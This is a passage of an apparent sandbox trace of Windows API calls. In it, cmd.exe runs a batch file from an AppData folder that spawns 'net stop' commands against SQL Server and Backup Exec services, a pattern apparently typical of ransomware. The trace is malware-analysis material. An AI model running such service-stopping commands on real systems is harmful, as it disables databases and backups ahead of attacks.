(_String1="net", _String2="EXIT") returned 9 [0201.918] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0201.918] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0201.918] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0201.918] _wcsicmp (_String1="net", _String2="START") returned -5 [0201.918] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0201.918] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0201.919] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0201.919] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0201.919] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0201.919] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0201.919] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0201.919] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0201.919] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0201.919] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0201.919] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0201.919] SetErrorMode (uMode=0x0) returned 0x1 [0201.919] GetProcessHeap () returned 0x3e0000 [0201.919] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0201.919] GetProcessHeap () returned 0x3e0000 [0201.919] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0201.920] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0201.920] GetProcessHeap () returned 0x3e0000 [0201.920] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0201.920] GetProcessHeap () returned 0x3e0000 [0201.920] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0201.920] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.920] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0201.921] GetLastError () returned 0x2 [0201.921] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0201.921] GetLastError () returned 0x2 [0201.921] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.922] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0201.922] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0201.922] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0201.922] GetLastError () returned 0x2 [0201.923] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0201.923] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0201.923] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.924] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0201.924] SetErrorMode (uMode=0x0) returned 0x1 [0201.924] GetProcessHeap () returned 0x3e0000 [0201.924] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0201.924] GetProcessHeap () returned 0x3e0000 [0201.924] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0201.924] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0201.924] GetProcessHeap () returned 0x3e0000 [0201.924] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0201.924] GetProcessHeap () returned 0x3e0000 [0201.924] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0201.925] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.925] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0201.925] GetLastError () returned 0x2 [0201.925] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0201.925] GetLastError () returned 0x2 [0201.926] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.926] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0201.926] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0201.927] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0201.927] GetLastError () returned 0x2 [0201.927] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0201.927] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0201.928] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.928] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0201.928] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0201.928] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0201.928] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0201.928] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MsDtsServer110 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MsDtsServer110 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MsDtsServer110 /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x760, dwThreadId=0xb70)) returned 1 [0201.932] CloseHandle (hObject=0x78) returned 1 [0201.932] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0201.932] GetProcessHeap () returned 0x3e0000 [0201.932] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0201.932] GetEnvironmentStringsW () returned 0x3f8408* [0201.932] GetProcessHeap () returned 0x3e0000 [0201.933] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0201.933] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0201.933] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0202.057] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0202.057] CloseHandle (hObject=0x74) returned 1 [0202.057] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0202.057] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0202.057] GetProcessHeap () returned 0x3e0000 [0202.057] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.057] GetEnvironmentStringsW () returned 0x3f8408* [0202.057] GetProcessHeap () returned 0x3e0000 [0202.057] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.057] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.057] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0202.057] GetProcessHeap () returned 0x3e0000 [0202.057] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.057] GetEnvironmentStringsW () returned 0x3f8408* [0202.057] GetProcessHeap () returned 0x3e0000 [0202.057] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.058] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.058] GetProcessHeap () returned 0x3e0000 [0202.058] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0202.058] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0202.058] _get_osfhandle (_FileHandle=1) returned 0x264 [0202.058] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0202.058] _get_osfhandle (_FileHandle=1) returned 0x264 [0202.058] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0202.058] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0202.058] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0202.058] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0202.058] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0202.059] SetConsoleInputExeNameW () returned 0x1 [0202.059] GetConsoleOutputCP () returned 0x1b5 [0202.059] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0202.059] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.059] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0202.059] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0202.059] _get_osfhandle (_FileHandle=3) returned 0x74 [0202.059] SetFilePointer (in: hFile=0x74, lDistanceToMove=3365, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd25 [0202.059] GetProcessHeap () returned 0x3e0000 [0202.059] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0202.059] GetProcessHeap () returned 0x3e0000 [0202.059] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0202.059] GetProcessHeap () returned 0x3e0000 [0202.059] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0202.059] GetProcessHeap () returned 0x3e0000 [0202.059] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0202.059] GetProcessHeap () returned 0x3e0000 [0202.059] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0202.059] GetProcessHeap () returned 0x3e0000 [0202.059] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0202.059] GetProcessHeap () returned 0x3e0000 [0202.059] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0202.059] GetProcessHeap () returned 0x3e0000 [0202.060] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0202.060] GetProcessHeap () returned 0x3e0000 [0202.060] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0202.060] GetProcessHeap () returned 0x3e0000 [0202.060] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0202.060] GetProcessHeap () returned 0x3e0000 [0202.060] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0202.060] GetProcessHeap () returned 0x3e0000 [0202.060] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0202.060] GetProcessHeap () returned 0x3e0000 [0202.060] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0202.060] _get_osfhandle (_FileHandle=3) returned 0x74 [0202.060] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd25 [0202.060] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xb9c, lpOverlapped=0x0) returned 1 [0202.060] SetFilePointer (in: hFile=0x74, lDistanceToMove=3396, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd44 [0202.060] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=31, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$BKUPEXEC /y\r\nramework /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 31 [0202.060] _get_osfhandle (_FileHandle=3) returned 0x74 [0202.060] GetFileType (hFile=0x74) returned 0x1 [0202.060] _get_osfhandle (_FileHandle=3) returned 0x74 [0202.061] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd44 [0202.061] GetProcessHeap () returned 0x3e0000 [0202.061] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0202.061] GetProcessHeap () returned 0x3e0000 [0202.061] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0202.064] _tell (_FileHandle=3) returned 3396 [0202.064] _close (_FileHandle=3) returned 0 [0202.064] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0202.064] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0202.064] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0202.064] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0202.064] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0202.064] _wcsicmp (_String1="net", _String2="CD") returned 11 [0202.064] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0202.064] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0202.064] _wcsicmp (_String1="net", _String2="REN") returned -4 [0202.064] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0202.064] _wcsicmp (_String1="net", _String2="SET") returned -5 [0202.064] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0202.064] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0202.064] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0202.064] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0202.064] _wcsicmp (_String1="net", _String2="MD") returned 1 [0202.064] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0202.064] _wcsicmp (_String1="net", _String2="RD") returned -4 [0202.064] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0202.064] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0202.064] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0202.064] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0202.064] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0202.065] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0202.065] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0202.065] _wcsicmp (_String1="net", _String2="VER") returned -8 [0202.065] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0202.065] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0202.065] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0202.065] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0202.065] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0202.065] _wcsicmp (_String1="net", _String2="START") returned -5 [0202.065] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0202.065] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0202.065] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0202.065] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0202.065] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0202.065] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0202.065] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0202.065] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0202.065] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0202.065] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0202.065] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0202.065] SetErrorMode (uMode=0x0) returned 0x1 [0202.065] GetProcessHeap () returned 0x3e0000 [0202.065] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0202.066] GetProcessHeap () returned 0x3e0000 [0202.066] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0202.066] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.066] GetProcessHeap () returned 0x3e0000 [0202.066] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0202.066] GetProcessHeap () returned 0x3e0000 [0202.066] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0202.066] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.067] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.067] GetLastError () returned 0x2 [0202.067] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.067] GetLastError () returned 0x2 [0202.068] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.068] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0202.068] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0202.069] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.069] GetLastError () returned 0x2 [0202.069] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0202.069] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0202.069] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.070] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0202.070] SetErrorMode (uMode=0x0) returned 0x1 [0202.070] GetProcessHeap () returned 0x3e0000 [0202.070] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0202.070] GetProcessHeap () returned 0x3e0000 [0202.070] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0202.071] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.071] GetProcessHeap () returned 0x3e0000 [0202.071] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0202.071] GetProcessHeap () returned 0x3e0000 [0202.071] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0202.071] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.071] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.072] GetLastError () returned 0x2 [0202.072] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.072] GetLastError () returned 0x2 [0202.072] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.073] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0202.073] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0202.073] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.073] GetLastError () returned 0x2 [0202.074] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0202.074] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0202.074] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.074] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0202.074] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0202.074] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0202.075] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0202.075] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLAgent$BKUPEXEC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLAgent$BKUPEXEC /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SQLAgent$BKUPEXEC /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xab4, dwThreadId=0x498)) returned 1 [0202.079] CloseHandle (hObject=0x74) returned 1 [0202.079] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0202.079] GetProcessHeap () returned 0x3e0000 [0202.079] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.079] GetEnvironmentStringsW () returned 0x3f8408* [0202.079] GetProcessHeap () returned 